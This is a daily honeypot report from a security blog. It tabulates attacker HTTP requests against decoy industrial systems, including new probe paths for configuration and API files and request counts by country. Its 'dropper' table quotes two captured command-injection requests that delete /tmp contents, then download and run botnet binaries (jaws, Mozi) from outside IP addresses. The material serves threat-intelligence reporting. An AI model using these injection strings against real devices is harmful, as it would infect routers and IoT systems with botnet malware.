Skip to main content
Shoggoth Industries - Security Blog
  1. Daily-Posts/

Report: 2025-06-04

·486 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-06-04
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 2 stage 1 IP address(es), linked to 2 dropper URL(s).

There are 39 new requests that have never been observed before (these were added to the monitored request database.).

A total of 1330 requests were recorded during the day, originating from 2 different countries, with a peak of 305 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USDubai
USIsrael

botnet_dropper_behaviour
#

remote_addrrequest
104.236.3.45GET /shell?cd+/tmp;rm+-rf+*;wget+ 129.159.107.197/jaws;sh+/tmp/jaws HTTP/1.1
1.70.141.84GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://1.70.141.84:33659/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
2121GET /admin/login.asp HTTP/1.1
2141GET /odinhttpcall1749065828 HTTP/1.1
2151GET /OdinHttpCall1749065828 HTTP/1.1
2161GET /Odin/http/call1749065828 HTTP/1.1
2521GET /odinhttpcall1748998981 HTTP/1.1
2531GET /OdinHttpCall1748998981 HTTP/1.1
2541GET /Odin/http/call1748998981 HTTP/1.1
2871\x04\x01\x01\xBB\x00\x00\x00\x01\x00api.ipify.org\x00
2881CONNECT api.ipify.org:443 HTTP/1.1
3131GET /8dhX HTTP/1.1
3141GET /6z6w HTTP/1.1
3291GET /db.yml HTTP/1.1
3301GET /db.yaml HTTP/1.1
3311GET /db.config HTTP/1.1
3321GET /dbconfig.php HTTP/1.1
3411GET /docker-compose.yaml HTTP/1.1
3421GET /docker-compose.dev.yml HTTP/1.1
3491GET /serverless.yaml HTTP/1.1
3501GET /serverless.json HTTP/1.1
3601GET /config/settings.yml HTTP/1.1
3881GET /system_info.php HTTP/1.1
3901GET /swagger.yaml HTTP/1.1
3911GET /swagger.yml HTTP/1.1
3931GET /api/swagger.yaml HTTP/1.1
3941GET /api/swagger.yml HTTP/1.1
3951GET /api/v1/swagger.json HTTP/1.1
3961GET /api/v2/swagger.json HTTP/1.1
3971GET /api/documentation.json HTTP/1.1
4111GET /vue.config.js HTTP/1.1
4131GET /webpack.dev.js HTTP/1.1
4141GET /webpack.prod.js HTTP/1.1
4181GET /angular-cli.json HTTP/1.1
4261GET /LlCa HTTP/1.1
4271GET /OmXI HTTP/1.1
4361\x12\x01\x00^\x00\x00\x01\x00\x00\x00$\x00\x06\x01\x00*\x00\x01\x02\x00+\x00\x01\x03\x00,\x00\x04\x04\x000\x00\x01\x05\x001\x00$\x06\x00U\x00\x01\xFF\x04\x07\x0C\xBC\x00\x00\x00\x00\x00\x00\x15\xD0\x00\xAF/\xF6~\xF7\x7F\x00\x00\xB0\xF8\xF1s\xCF\x00\x00\x00\xE0\x81\x1B\x7F\xF7\x7F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01
4421\x12\x01\x00^\x00\x00\x01\x00\x00\x00$\x00\x06\x01\x00*\x00\x01\x02\x00+\x00\x01\x03\x00,\x00\x04\x04\x000\x00\x01\x05\x001\x00$\x06\x00U\x00\x01\xFF\x04\x07\x0C\xBC\x00\x00\x00\x00\x00\x00\x15\xD0\x00\xAF/\x8A\xBD\xF7\x7F\x00\x00\x90\xF6\x85\xAA\xAE\x00\x00\x00\xE0\x81\xAF\xBD\xF7\x7F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01
4451GET /odinhttpcall1749060061 HTTP/1.1
4461GET /OdinHttpCall1749060061 HTTP/1.1
4471GET /Odin/http/call1749060061 HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0305US
1219BG
2130DE
396CN
494GB
561JP
654CA
749IN
848HK
939NL
1032NG
1124PL
1224SA
1317SC
1415PT
1515CH
1615FR
1712AR
189GH
197IL
205TR
215RU
225UA
235BE
245AO
254ZA
264ID
273KR
283IT
293KZ
303SG
312RO
322VN
332TW
342BR
352IE
362CO
372HR
381MC
391IR
401ES
411QA
421SE
431CZ

Related

Report: 2025-06-03
·683 words
Repport Daily
Report: 2025-06-02
·353 words
Repport Daily
Report: 2025-06-01
·345 words
Repport Daily